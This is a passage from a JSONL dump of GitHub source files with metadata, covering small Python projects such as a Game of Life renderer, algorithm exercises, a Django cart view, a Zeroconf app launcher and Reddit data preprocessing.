(shift_x + j * self.block_size, shift_y),\n (shift_x + j * self.block_size, shift_y + self.rows * self.block_size), 2)\n pygame.draw.line(destiny, (0), (shift_x, shift_y + i * self.block_size),\n (shift_x + self.columns * self.block_size, shift_y + i * self.block_size), 2)\n pygame.draw.line(destiny, (0), (shift_x + self.width, shift_y),\n (shift_x + self.width, shift_y + self.height), 2)\n pygame.draw.line(destiny, (0), (shift_x, shift_y + self.height),\n (shift_x + self.width, shift_y + self.height), 2)\n","repo_name":"FranciscoCharles/conways-game-of-life-in-python","sub_path":"src/life_game.py","file_name":"life_game.py","file_ext":"py","file_size_in_byte":6176,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"29"} +{"seq_id":"11158887375","text":"\"\"\"вместо перечисления импорта, можно поставить *(звёздочку)\n и всё импортируется\n ещё один способ импорта через точку, например,\n man = base_person.Person(\"Алекс\", 30, 176)\n \"\"\"\nimport base_person #from base_person import * #Person, Warrior\n\nman = base_person.Person(\"Алекс\", 30, 176)\nman.description_person()\nwarrior = base_person.Warrior(\"Конон\", 35, 200)\nprint(\"Нового человека зовут : \" + warrior.description_person())\n\n# Персонаж (Родительский класс)\n\n# подкласс: Раса (люди, эльфы, гномы, орки)\n# подкласс: Специальность (воин, наг, лучник)\n\n# Родительский класс Персонаж\n\n\n# Подкласс Раса Специальность\n\n# Подкласс подкласса люди эльфы гномы орки воин маг лучник\n\n\n\n","repo_name":"denisofflive/Autotesting_python_selenium_stepik","sub_path":"3. Объектно-ориентированное программирование/man.py","file_name":"man.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"40272526031","text":"import sys\ninput = sys.stdin.readline \n\nt = int(input())\n\nfor _ in range(t):\n m, n, x, y = map(int, input().strip().split())\n bool = False\n while(x <= m*n):\n \n if ((x - y) % n == 0):\n print(x)\n bool = True\n break\n x += m\n\n if bool == False:\n print(-1)","repo_name":"Hamkua/Algorithm","sub_path":"백준/Silver/6064. 카잉 달력/카잉 달력.py","file_name":"카잉 달력.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"17102915728","text":"import logging\nimport sys\n\nimport pandas as pd\n\nfrom tourism.configuration.s3_operations import S3Operation\nfrom tourism.exception import TourismException\nfrom tourism.utils.main_utils import MainUtils\nfrom tourism.constant import MODEL_FILE_NAME, IO_FILES_BUCKET, ARTIFACTS_DIR\n\nlog_writer = logging.getLogger(__name__)\n\n\nclass TourismData:\n def __init__(\n self,\n Age,\n CityTier,\n DurationOfPitch,\n NumberOfPersonVisiting,\n NumberOfFollowups,\n PreferredPropertyStar,\n NumberOfTrips,\n Passport,\n PitchSatisfactionScore,\n OwnCar,\n NumberOfChildrenVisiting,\n MonthlyIncome,\n TypeofContact,\n Occupation,\n Gender,\n ProductPitched,\n MaritalStatus,\n Designation,\n ):\n\n self.Age = Age\n\n self.CityTier = CityTier\n\n self.DurationOfPitch = DurationOfPitch\n\n self.NumberOfPersonVisiting = NumberOfPersonVisiting\n\n self.NumberOfFollowups = NumberOfFollowups\n\n self.PreferredPropertyStar = PreferredPropertyStar\n\n self.NumberOfTrips = NumberOfTrips\n\n self.Passport = Passport\n\n self.PitchSatisfactionScore = PitchSatisfactionScore\n\n self.OwnCar = OwnCar\n\n self.NumberOfChildrenVisiting = NumberOfChildrenVisiting\n\n self.MonthlyIncome = MonthlyIncome\n\n self.TypeofContact = TypeofContact\n\n self.Occupation = Occupation\n\n self.Gender = Gender\n\n self.ProductPitched = ProductPitched\n\n self.MaritalStatus = MaritalStatus\n\n self.Designation = Designation\n\n def get_tourism_input_data_frame(self):\n\n log_writer.info(\n \"Entered get_Tourism_input_data_frame method of TourismData class\"\n )\n\n try:\n Tourism_input_dict = self.get_tourism_as_dict()\n\n log_writer.info(\"Got car data as dict\")\n\n log_writer.info(\n \"Exited get_tourism_input_data_frame method of TourismData class\"\n )\n\n return pd.DataFrame(Tourism_input_dict)\n\n except Exception as e:\n raise TourismException(e, sys) from e\n\n def get_tourism_as_dict(self):\n log_writer.info(\"Entered get_tourism_as_dict method as TourismData class\")\n\n try:\n input_data = {\n \"Age\": [self.Age],\n \"CityTier\": [self.CityTier],\n \"DurationOfPitch\": [self.DurationOfPitch],\n \"NumberOfPersonVisiting\": [self.NumberOfPersonVisiting],\n \"NumberOfFollowups\": [self.NumberOfFollowups],\n \"PreferredPropertyStar\": [self.PreferredPropertyStar],\n \"NumberOfTrips\": [self.NumberOfTrips],\n \"Passport\": [self.Passport],\n \"PitchSatisfactionScore\": [self.PitchSatisfactionScore],\n \"OwnCar\": [self.OwnCar],\n \"NumberOfChildrenVisiting\": [self.NumberOfChildrenVisiting],\n \"MonthlyIncome\": [self.MonthlyIncome],\n \"TypeofContact\": [self.TypeofContact],\n \"Occupation\": [self.Occupation],\n \"Gender\": [self.Gender],\n \"ProductPitched\": [self.ProductPitched],\n \"MaritalStatus\": [self.MaritalStatus],\n \"Designation\": [self.Designation],\n }\n\n log_writer.info(\"Created tourism data dict\")\n\n input_data = pd.DataFrame(input_data)\n\n log_writer.info(\"Created a dataframe of tourism data\")\n\n log_writer.info(\"Exited get_tourism_as_dict method as TourismData class\")\n\n return input_data\n\n except Exception as e:\n raise TourismException(e, sys) from e\n\n\nclass ModelPredictor:\n def __init__(self):\n self.utils = MainUtils()\n\n self.s3 = S3Operation()\n\n def predict(self, X):\n log_writer.info(\"Entered predict method of TourismPredictor class\")\n\n try:\n best_model = self.s3.load_model(\n MODEL_FILE_NAME, IO_FILES_BUCKET, ARTIFACTS_DIR\n )\n\n # self, model_name: str, bucket_name: str, model_dir: str = None\n\n log_writer.info(\"Loaded best model from s3 bucket\")\n\n tourism_op = best_model.predict(X)\n\n log_writer.info(\"Used best model to get predictions\")\n\n log_writer.info(\"Exited predict method of TourismPredictor class\")\n\n return tourism_op\n\n except Exception as e:\n raise TourismException(e, sys) from e\n","repo_name":"vishalsingh17/TouristPackagePrediction","sub_path":"tourism/components/model_predictor.py","file_name":"model_predictor.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"29"} +{"seq_id":"42141720955","text":"import hashlib\n\ndef calculate_hash(data):\n sha256 = hashlib.sha256()\n sha256.update(data.encode())\n return sha256.hexdigest()\n\n# Example usage\ndata = \"Hello, blockchain!\"\nhash_value = calculate_hash(data)\nprint(f\"Data: {data}\")\nprint(f\"SHA-256 Hash: {hash_value}\")\n","repo_name":"BenjaminBurton/NetworkP2P","sub_path":"src/protocol/sha.py","file_name":"sha.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"39562449261","text":"#!/usr/bin/env python3\n\n# Python standard library imports\nimport weakref\nimport subprocess\nimport json\nimport urllib\n# Imports from external modules\nfrom gi.repository import Gtk\nfrom gi.repository.GdkPixbuf import Pixbuf, PixbufLoader\nfrom zeroconf import ServiceBrowser, Zeroconf\n# Internal modules import\nfrom .mainwindow import MainWindow\n\n\nclass ZeroconfBrowserDelegate:\n\n def is_service_valid(self, info):\n raise NotImplementedError\n\n\nclass ZeroconfListener(object):\n\n def __init__(self, browser):\n self.__browser_ref = weakref.ref(browser)\n\n def add_service(self, zeroconf, service_type, name):\n info = zeroconf.get_service_info(service_type, name)\n self.__browser_ref().add_service(info)\n\n def remove_service(self, _, service_type, name):\n self.__browser_ref().remove_service(service_type, name)\n\n\nclass Application:\n\n DEFAULT_ENCODING = \"utf-8\"\n SERVICE_TYPE_HTTP = \"_http._tcp.local.\"\n KEY_WEB_APP_INFO_PATH = \"net_app_info_path\"\n KEY_WEB_APP_VENDOR_UUID = \"net_app_vendor_uuid\"\n\n COLUMN_PIXEL_BUFFER = 0\n COLUMN_NAME_LABEL = 1\n COLUMN_IDENTIFIER = 2\n\n def __init__(self):\n\n self.__zeroconf = None\n self.__listener = None\n self.__browser = None\n self.__service_dict = {}\n self.__net_app_dict = {}\n self.__is_visible = False\n\n self.__main_window = MainWindow()\n self.__main_window.connect(\"delete-event\", self.on_close_button_clicked)\n\n self.net_apps_list_store = Gtk.ListStore(Pixbuf, str, str)\n self.__main_window.icon_view.set_model(self.net_apps_list_store)\n self.__main_window.icon_view.set_pixbuf_column(0)\n self.__main_window.icon_view.set_text_column(1)\n self.__main_window.icon_view.connect(\"item-activated\", self.on_item_activated, self.net_apps_list_store)\n # for i in range(0, 2):\n # pixel_buffer = Gtk.IconTheme.get_default().load_icon(\"package-x-generic\", 64, 0)\n # self.net_apps_list_store.append([pixel_buffer, \"Name label\", \"identifier\"])\n\n # MARK: Application live cycle\n\n def start(self):\n protocol = self.SERVICE_TYPE_HTTP\n self.__zeroconf = Zeroconf()\n self.__listener = ZeroconfListener(self)\n self.__browser = ServiceBrowser(self.__zeroconf, protocol, self.__listener)\n\n self.__main_window.show_all()\n self.__is_visible = True\n Gtk.main()\n\n def stop(self):\n self.__zeroconf.close()\n self.__zeroconf = None\n self.__listener = None\n self.__browser = None\n Gtk.main_quit()\n\n def show_main_window(self):\n if self.__is_visible is False:\n self.__main_window.show()\n self.__is_visible = True\n\n def hide_main_window(self):\n if self.__is_visible is True:\n self.__main_window.hide()\n self.__is_visible = False\n\n # MARK: Zeroconf interface\n\n @classmethod\n def find_list_entry_by_name(cls, model, path, iterator, data):\n if model.get_value(iterator, cls.COLUMN_IDENTIFIER) == data[\"name\"]:\n data[\"iter\"] = iterator\n return True\n else:\n return False\n\n def add_service(self, info):\n if info is None:\n return\n display_name = info.name[:-(len(self.SERVICE_TYPE_HTTP) + 1)]\n self.__service_dict[info.name] = info\n pixel_buffer = Gtk.IconTheme.get_default().load_icon(\"package-x-generic\", 64, 0)\n self.net_apps_list_store.append([pixel_buffer, display_name, info.name])\n self.resolve_service(info)\n\n def download_app_link_resources(self, info, info_uri, info_path):\n ipv4_address = '.'.join(map(str, info.address))\n info_directory = '/'.join(info_path[1:].split('/')[:-1])\n info_directory = '/' + info_directory if len(info_directory) > 0 else info_directory\n port = info.port\n with urllib.request.urlopen(info_uri) as info_response:\n json_string = info_response.read().decode(self.DEFAULT_ENCODING)\n try:\n app_info_dict = json.loads(json_string)\n except json.decoder.JSONDecodeError as e:\n print(\"Could not decode JSON\")\n print(json_string)\n print(e)\n return\n self.__net_app_dict[info.name] = app_info_dict\n icon_file = app_info_dict[\"icon\"][\"64\"]\n app_name = app_info_dict[\"info\"][\"app_name\"]\n self.update_list_store_element(info.name, name_label=app_name)\n try:\n loader = PixbufLoader()\n icon_uri = \"http://{0}:{1}{2}/{3}\".format(ipv4_address, port, info_directory, icon_file)\n response = urllib.request.urlopen(icon_uri)\n loader.write(response.read())\n loader.close()\n self.update_list_store_element(info.name, pixel_buffer=loader.get_pixbuf())\n except:\n print(\"Could not load image:\", icon_uri)\n\n def resolve_service(self, info):\n ipv4_address = '.'.join(map(str, info.address))\n port = info.port\n try:\n info_path = info.properties[self.KEY_WEB_APP_INFO_PATH.encode()].decode(self.DEFAULT_ENCODING)\n except KeyError:\n print(info.name, \"is not a NetApp:\", info)\n else:\n info_path = \"/\" + info_path if info_path[0] != \"/\" else info_path\n info_uri = \"http://{0}:{1}{2}\".format(ipv4_address, port, info_path)\n try:\n self.download_app_link_resources(info, info_uri, info_path)\n except urllib.error.HTTPError as e:\n print(\"Could not download resources\", info_uri, e)\n except urllib.error.URLError as e:\n print(\"Could not download resources\", info_uri, e)\n\n def update_list_store_element(self, name, name_label=None, pixel_buffer=None):\n data = {\"name\": name, \"iter\": None}\n self.net_apps_list_store.foreach(self.find_list_entry_by_name, data)\n if data[\"iter\"] is not None:\n if name_label is not None:\n self.net_apps_list_store.set_value(data[\"iter\"], self.COLUMN_NAME_LABEL, name_label)\n if pixel_buffer is not None:\n self.net_apps_list_store.set_value(data[\"iter\"], self.COLUMN_PIXEL_BUFFER, pixel_buffer)\n\n def remove_service(self, _, name):\n data = {\"name\": name, \"iter\": None}\n self.net_apps_list_store.foreach(self.find_list_entry_by_name, data)\n if data[\"iter\"] is not None:\n self.net_apps_list_store.remove(data[\"iter\"])\n del(self.__service_dict[name])\n del(self.__net_app_dict[name])\n\n # MARK: User interface\n\n def on_item_activated(self, icon_view, tree_path, store):\n name = store.get_value(store.get_iter(tree_path), self.COLUMN_IDENTIFIER)\n info = self.__service_dict[name]\n ipv4_address = '.'.join(map(str, info.address))\n port = info.port\n display_uri = \"http://{0}:{1}/\".format(ipv4_address, port)\n command = [\"xdg-open\", display_uri]\n subprocess.call(command)\n print(info)\n icon_view.unselect_all()\n self.hide_main_window()\n\n def on_close_button_clicked(self, widget, args):\n self.stop()\n\n\n\n\n\n\n","repo_name":"chris109b/NetAppLauncher-PyGTK","sub_path":"netapplauncher/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":7269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"41233178833","text":"from django.http import HttpRequest, JsonResponse\nfrom django.shortcuts import render\nfrom order.models import Order, OrderDetail\nfrom shop.models import ProductList\n\n\ndef add_product(request: HttpRequest):\n product_id = request.GET.get('product_id')\n count = request.GET.get('count')\n if request.user.is_authenticated:\n product = ProductList.objects.filter(id=product_id, is_delete=False, is_active=True).first()\n if product is not None:\n user_order, created = Order.objects.get_or_create(is_order_paid=False, user_id=request.user.id)\n user_order_detail = user_order.orderdetail_set.filter(product_id=product_id).first()\n if user_order_detail is not None:\n user_order_detail.count += int(count)\n user_order_detail.save()\n return JsonResponse({\n 'status': 'success'\n })\n else:\n new_order_detail = OrderDetail(order_id=user_order.id, product_id=product_id, count=count)\n new_order_detail.save()\n else:\n\n return JsonResponse({\n 'status': 'product_not_found'\n })\n else:\n return JsonResponse({\n 'status': 'not_login'\n })\n","repo_name":"pooya13821026/shop","sub_path":"order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"3136782828","text":"#!/usr/bin/env python\n\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndx = 0.01\nmovement_beat_duration = 2.0\nbpm = 60.0\n\ntime_step = 0.05\n\ntf = movement_beat_duration / (bpm / 60.0)\nt = np.arange(0, tf, time_step)\nx = dx * np.sin(2 * math.pi / tf * t)\n\nplt.plot(t, x, 'o')\nplt.show()\n\nfor i in range(len(x)):\n print('[{}, {}, {}, {}, {}, {}, {}],'.format(x[i], 0, 0, 0, 0, 0, 1))\n","repo_name":"introlab/t-top","sub_path":"tools/dance_movement_generators/head_front_back.py","file_name":"head_front_back.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"29"} +{"seq_id":"20775976223","text":"# this program will calculate the aggregate for the 22-23 applicants of PU\r\n\r\nmatric = int(input(\"Enter matric marks: \"))\r\ninter = int(input(\"Enter inter marks: \"))\r\nUSAT = int(input(\"Enter USAT marks: \"))\r\n\r\nmatricage = ((matric/1100)*100)\r\ninterage = ((inter/1100)*100)\r\nUSAT = ((USAT/100)*100)\r\n\r\nmerit = ((matricage*0.25) + (interage*0.60) + (USAT*0.15))\r\nprint(\"Your Aggregate for year 2022 in PU is \", merit)","repo_name":"MuhammadTayyab98/Python-Programs","sub_path":"PU Agg Calculator 22.py","file_name":"PU Agg Calculator 22.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"34942503454","text":"class Student:\n def __init__(self, name, surname, gender):\n self.name = name\n self.surname = surname\n self.gender = gender\n self.finished_courses = []\n self.courses_in_progress = []\n self.grades = {}\n\n def rate_lecture(self, lecturer, course, grade):\n if isinstance(lecturer, Lecturer) and course in self.courses_in_progress and course in lecturer.courses_attached:\n if course in lecturer.grades:\n lecturer.grades[course] += [grade]\n else:\n lecturer.grades[course] = [grade]\n else:\n return 'Ошибка'\n\n def add_courses(self, course_name):\n self.finished_courses.append(course_name)\n\n def average_grade_hw(self, grade):\n all_list_grades = []\n for course in self.grades:\n all_list_grades += self.grades[course]\n return round(sum(all_list_grades) / len(all_list_grades), 2)\n\n def __lt__(self, other):\n if not isinstance(other, Student):\n print('Not a Student')\n return\n return self.average_grade_hw(self.grades) < other.average_grade_hw(other.grades)\n\n def __str__(self):\n courses_all_prgs = ', '\n finished_crs = ', '\n res = f\"Имя: {self.name}\\nФамилия: {self.surname}\\nСредняя оценка за домашние задания: \" \\\n f\"{self.average_grade_hw(self.grades)}\\n\" \\\n f\"Курсы в процессе изучения: {courses_all_prgs.join(self.courses_in_progress)}\\n\" \\\n f\"Завершенные курсы: {finished_crs.join(self.finished_courses)}\"\n return res\n\n\nclass Mentor:\n def __init__(self, name, surname):\n self.name = name\n self.surname = surname\n self.courses_attached = []\n\n\nclass Lecturer(Mentor):\n def __init__(self, name, surname):\n super().__init__(name, surname)\n self.grades = {}\n\n def average_grades_lec(self, self_grades):\n all_list_grades = []\n for course in self.grades:\n all_list_grades += self.grades[course]\n return round(sum(all_list_grades) / len(all_list_grades), 2)\n def __lt__(self, other):\n if not isinstance(other, Mentor):\n print('Not a Lecturer')\n return\n return self.average_grades_lec(self.grades) < other.average_grades_lec(self.grades)\n\n def __str__(self):\n res = f\"Имя: {self.name}\\nФамилия: {self.surname}\\nСредняя оценка за лекции: {self.average_grades_lec(self.grades)}\"\n return res\n\n\nclass Reviewer(Mentor):\n def rate_hw(self, student, course, grade):\n if isinstance(student, Student) and course in self.courses_attached and course in student.courses_in_progress:\n if course in student.grades:\n student.grades[course] += [grade]\n else:\n student.grades[course] = [grade]\n else:\n return 'Ошибка'\n def __str__(self):\n res = f\"Имя: {self.name}\\nФамилия: {self.surname}\"\n return res\n\n\nbest_student = Student('Ruoy', 'Eman', 'your_gender')\nbest_student.courses_in_progress += ['Python']\nbest_student.finished_courses += ['Ведение в программирование']\n\nany_student = Student('Nikolay', 'Smithov', 'your_gender')\nany_student.courses_in_progress += ['Python_backend']\nany_student.courses_in_progress += ['Python_frontend']\nany_student.finished_courses += ['Ведение в программирование']\n\ncool_reviewer = Reviewer('Mikhail', 'Svetlov')\ncool_reviewer.courses_attached += ['Python']\ncool_reviewer.courses_attached += ['Python_backend']\ncool_reviewer.courses_attached += ['Python_frontend']\n\ncool_reviewer.rate_hw(best_student, 'Python', 10)\ncool_reviewer.rate_hw(best_student, 'Python', 10)\ncool_reviewer.rate_hw(best_student, 'Python', 10)\n\ncool_reviewer.rate_hw(any_student, 'Python_backend', 10)\ncool_reviewer.rate_hw(any_student, 'Python_backend', 9)\ncool_reviewer.rate_hw(any_student, 'Python_backend', 9)\n\nbest_lecturer = Lecturer('Ivan', 'Petrov')\nbest_lecturer.courses_attached += ['Python_backend']\nbest_lecturer.courses_attached += ['Python_frontend']\n\nother_lecturer = Lecturer('Johann ', 'Bach')\nother_lecturer.courses_attached += ['Python_backend']\nother_lecturer.courses_attached += ['Python_frontend']\n\nany_student.rate_lecture(best_lecturer, 'Python_backend', 10)\nany_student.rate_lecture(best_lecturer, 'Python_backend', 10)\nany_student.rate_lecture(best_lecturer, 'Python_backend', 10)\n\nany_student.rate_lecture(best_lecturer, 'Python_frontend', 10)\nany_student.rate_lecture(best_lecturer, 'Python_frontend', 10)\nany_student.rate_lecture(best_lecturer, 'Python_frontend', 9)\n\nany_student.rate_lecture(other_lecturer, 'Python_backend', 10)\nany_student.rate_lecture(other_lecturer, 'Python_backend', 10)\nany_student.rate_lecture(other_lecturer, 'Python_backend', 9)\n\nany_student.rate_lecture(other_lecturer, 'Python_frontend', 10)\nany_student.rate_lecture(other_lecturer, 'Python_frontend', 10)\nany_student.rate_lecture(other_lecturer, 'Python_frontend', 9)\n\nprint(cool_reviewer)\nprint()\nprint(best_lecturer)\nprint()\nprint(other_lecturer)\nprint()\nprint(any_student)\nprint()\nprint(best_lecturer > other_lecturer)\nprint()\nprint(best_student < any_student)\n","repo_name":"Nikolay-Zavrazhnov/oop_task_3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"27798702825","text":"import json\nimport os.path\nfrom typing import TYPE_CHECKING, Optional, Type, TypeVar, Union\n\nfrom khl import Message, Event\n\nfrom ..command.builder.nodes.basic import Literal\nfrom ..utils.logger import ColoredLogger\nfrom ..utils.serializer import Serializable\n\nif TYPE_CHECKING:\n from ..khld_server import KHLDaemonServer\n\nSerializableType = TypeVar('SerializableType')\n\n\nclass Interface:\n def __init__(self, khld_server: 'KHLDaemonServer', plugin_id: str) -> None:\n self.khld_server = khld_server\n self.plugin_manager = self.khld_server.plugin_manager\n self.command_manger = self.khld_server.command_manager\n self.plugin_id = plugin_id\n self.config = self.plugin_manager.config\n self.logger = ColoredLogger(level=self.config.log_level, plugin_id=self.plugin_id)\n\n\nclass PluginInterface(Interface):\n\n def register_help_messages(self, prefix: str, desc: str):\n self.plugin_manager.help_messages[prefix] = desc\n\n def register_command(self, literal: Literal):\n self.command_manger.register_command(literal)\n\n def load_config_simple(\n self, file_name='config.json', default_config: Optional = None, *, in_data_folder: bool = True,\n echo_in_console: bool = True, target_class: Optional[Type[SerializableType]] = None,\n encoding: str = 'utf8'\n ) -> Union[dict, SerializableType]:\n def log(msg):\n if echo_in_console:\n self.logger.info(msg)\n\n if target_class is not None:\n target_class: Serializable\n if default_config is None:\n default_config = target_class.get_default().serialize()\n config_file_path = os.path.join(self.get_data_folder(), file_name) if in_data_folder else file_name\n needs_save = False\n try:\n with open(config_file_path, encoding=encoding) as file_handle:\n read_data: dict = json.load(file_handle)\n except Exception as e:\n if default_config is not None:\n result_config = default_config.copy()\n else:\n raise e\n needs_save = True\n log('读取配置文件失败,使用默认值: {}'.format(e))\n else:\n result_config = read_data\n if default_config is not None:\n for key, value in default_config.items():\n if key in read_data:\n result_config[key] = read_data[key]\n else:\n result_config[key] = value\n log(f'发现缺失的键 \"{key}\",使用默认值\"{value}\"')\n needs_save = True\n log('配置文件已加载')\n if target_class is not None:\n try:\n result_config = target_class.deserialize(result_config)\n except Exception as e:\n result_config = target_class.get_default()\n needs_save = True\n log('读取配置文件失败,使用默认值: {}'.format(e))\n else:\n if default_config is not None:\n for key in list(result_config.keys()):\n if key not in default_config:\n result_config.pop(key)\n if needs_save:\n self.save_config_simple(result_config, file_name=file_name, in_data_folder=in_data_folder)\n return result_config\n\n def get_data_folder(self) -> str:\n plugin_data_folder = os.path.join('config', self.plugin_id)\n if not os.path.isdir(plugin_data_folder):\n os.makedirs(plugin_data_folder)\n return plugin_data_folder\n\n def save_config_simple(\n self, config: Union[dict, Serializable], file_name: str = 'config.json', *, in_data_folder: bool = True,\n encoding: str = 'utf8'\n ) -> None:\n config_file_path = os.path.join(self.get_data_folder(), file_name) if in_data_folder else file_name\n if isinstance(config, Serializable):\n data = config.serialize()\n else:\n data = config\n target_folder = os.path.dirname(config_file_path)\n if len(target_folder) > 0 and not os.path.isdir(target_folder):\n os.makedirs(target_folder)\n with open(config_file_path, 'w', encoding=encoding) as file:\n json.dump(data, file, indent=4, ensure_ascii=False)\n\n\nclass MessageInterface(Interface):\n\n def __init__(self, khld_server: 'KHLDaemonServer', plugin_id: str, msg: Message) -> None:\n super().__init__(khld_server, plugin_id)\n self.message = msg\n\n\nclass EventInterface(Interface):\n\n def __init__(self, khld_server: 'KHLDaemonServer', plugin_id: str, event: Event) -> None:\n super().__init__(khld_server, plugin_id)\n self.event = event\n","repo_name":"DancingSnow0517/KHLDaemon","sub_path":"khldaemon/plugin/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":4793,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"15279894745","text":"import sys\n\nN, M = map(int, sys.stdin.readline().split())\nminutes = list(map(int, sys.stdin.readline().split()))\n\n\ndef counter(arr, limit):\n count = 1\n tmp_sum = 0\n for one in arr:\n if limit < one:\n return 0xFFFFFF\n else:\n if tmp_sum + one <= limit:\n tmp_sum += one\n else:\n count += 1\n tmp_sum = one\n return count\n\n\nlimit = max(sum(minutes) // M, max(minutes))\n\nwhile True:\n while M < counter(minutes, limit):\n limit += 1\n while counter(minutes, limit - 1) <= M:\n limit -= 1\n print(limit)\n break\n","repo_name":"Hamsik2rang/Krafton-Jungle-Whiteboard-Algorithm","sub_path":"이현홍/old/2343 - 기타 레슨.py","file_name":"2343 - 기타 레슨.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"29"} +{"seq_id":"30704744702","text":"import pika\n\nmessage=\"Hallo wereld!\"\n\nconnection = pika.BlockingConnection(\n pika.ConnectionParameters(host='localhost'))\nchannel = connection.channel()\n\nchannel.queue_declare(queue='hello')\n\nchannel.basic_publish(exchange='', routing_key='hello', body=message)\nprint(\" [x] Sent \"+message)\nconnection.close()","repo_name":"MichielBbal/Notebooks","sub_path":"amqp_send.py","file_name":"amqp_send.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"43745775938","text":"def to_binary(number, arr):\n number = int(number)\n division = number // 2\n rest = number % 2\n\n arr.append(str(rest))\n if division != 1 and number != 0:\n to_binary(division, arr)\n elif number == 0:\n arr = ['0']\n else:\n arr.append(str(1))\n\n arr.reverse()\n return ''.join(arr)\n\ndef to_decimal(binary):\n arr = [*str(binary)]\n arr.reverse()\n i = 0\n sum = 0\n exp = 0\n for number in arr:\n if int(number) != 0 and int(number) != 1:\n raise Exception('Números binários só podem utilizar dois algarismos, 0 ou 1.')\n if int(number) != 0:\n exp = 2 ** int(i)\n sum += exp \n i += 1\n return sum\n \nDIV_LENGTH = 35\n\ndef converter():\n print('='* DIV_LENGTH)\n print('Binary to Decimal Converter')\n print('='* DIV_LENGTH)\n print('\\n')\n\n while True:\n print('='* DIV_LENGTH)\n print(\"Qual operação você deseja realizar? \\n 1: Binário -> Decimal \\n 2: Decimal -> Binário\")\n operation = int(input())\n\n if operation == 1:\n print('='* DIV_LENGTH)\n print(\"Informe o número que deseja converter para decimal\")\n binary_number = input()\n print(f'O número binário \"{binary_number}\" equivale ao número decimal \"{to_decimal(binary_number)}\".')\n elif operation == 2:\n print('='* DIV_LENGTH)\n print(\"Informe o número que deseja converter para binário\")\n list = []\n decimal_number = input()\n print(f'O número decimal \"{decimal_number}\" equivale ao número binário \"{to_binary(decimal_number, list)}\"')\n else: \n print('='* DIV_LENGTH)\n print('Operação inválida')\n \n print('Converter novamente? (Y/N)')\n run_again = input()\n if (run_again.lower() == 'n'):\n break\n elif run_again.lower() != 'y' and run_again.lower() != 'n':\n print(f'Considerando que era pra informar \"Y\" ou \"N\" e você informou \"{run_again}\", vamos considerar que você deseja executar mais uma conversão.')\n\nconverter()","repo_name":"phllp/udesc","sub_path":"binary_converter/binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"72661853519","text":"import json\nfrom collections import defaultdict\nfrom pathlib import Path\n\nimport numpy as np\nfrom tqdm import tqdm\n\n\nscript_folder = Path(__file__).parent\n\n\n# Read data\ndataset = []\n\nwith open(script_folder / 'threads.jsonl', encoding=\"utf8\") as f:\n for line in tqdm(f, total=65169, desc='Read Threads'):\n thread = json.loads(line)\n\n original_poster = thread['author']\n delta_thread = thread['delta']\n\n def _go_through_comments(comments: list) -> bool:\n global sum_num_comments\n # check delta\n has_delta_comment = False\n for comment in comments:\n if comment['author'] == original_poster and ('∆' in comment['body'] or '\\u2206' in comment['body']):\n has_delta_comment = True\n comments.remove(comment) # delete delta award comment\n break\n # process\n for comment in comments:\n # filter delete comments by moderator\n if comment['distinguished'] == 'moderator' and 'removed' in comment['body'].lower():\n continue\n # filter deleted comments\n if comment['body'] == '[deleted]':\n continue\n dataset.append({\n 'id': comment['id'],\n 'author': comment['author'],\n 'parent_id': comment['parent_id'],\n 'level': comment['level'],\n 'distinguished': comment['distinguished'],\n 'score': comment['score'],\n 'title': None,\n 'body': comment['body'],\n 'delta_awarded': _go_through_comments(comment['children']), # TODO: delta\n 'delta_thread': delta_thread,\n })\n return has_delta_comment\n\n # filter empty discussions\n if thread['num_comments'] <= 1:\n continue\n # filter modpost\n if '[Mod Post]' in thread['title']:\n continue\n\n # start recursion for the thread\n _go_through_comments(thread['comments'])\n\n dataset.append({\n 'id': thread['id'],\n 'author': original_poster,\n 'parent_id': None,\n 'level': None,\n 'distinguished': thread['distinguished'],\n 'score': thread['score'],\n 'title': thread['title'],\n 'body': thread['selftext'],\n 'delta_awarded': False,\n 'delta_thread': delta_thread,\n })\n\n\ndataset = dataset[::-1]\ndataset_lvl0 = [sample for sample in dataset if sample['level'] is None or sample['level'] == 0]\ndataset_delta = [sample for sample in dataset if sample['delta_thread']]\ndataset_delta_lvl0 = [sample for sample in dataset_lvl0 if sample['delta_thread']]\n\n\n# EDA\nprint('Dataset (full):', len(dataset))\nprint('Dataset (lvl0):', len(dataset_lvl0))\nprint('Dataset (delta):', len(dataset_delta))\nprint('Dataset (delta lvl0):', len(dataset_delta_lvl0))\n\nnum_threads = sum(1 for sample in dataset if sample['level'] is None)\nnum_threads_delta = sum(1 for sample in dataset_delta if sample['level'] is None)\nprint('Num threads:', num_threads)\nprint('Num delta threads:', 